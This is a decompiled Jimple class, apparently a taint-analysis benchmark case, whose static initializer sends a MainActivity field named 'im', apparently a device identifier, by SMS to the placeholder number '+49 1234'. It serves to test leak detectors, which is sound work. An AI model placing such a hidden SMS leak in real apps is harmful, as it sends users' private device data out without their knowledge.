public class de.ecspride.MainActivity$StaticInitClass1 extends java.lang.Object
{

    static void <clinit>()
    {
        android.telephony.SmsManager r0;
        java.lang.String $r1;

        r0 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        $r1 = <de.ecspride.MainActivity: java.lang.String im>;

        virtualinvoke r0.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+49 1234", null, $r1, null, null);

        return;
    }

    public void <init>()
    {
        de.ecspride.MainActivity$StaticInitClass1 r0;

        r0 := @this: de.ecspride.MainActivity$StaticInitClass1;

        specialinvoke r0.<java.lang.Object: void <init>()>();

        return;
    }
}
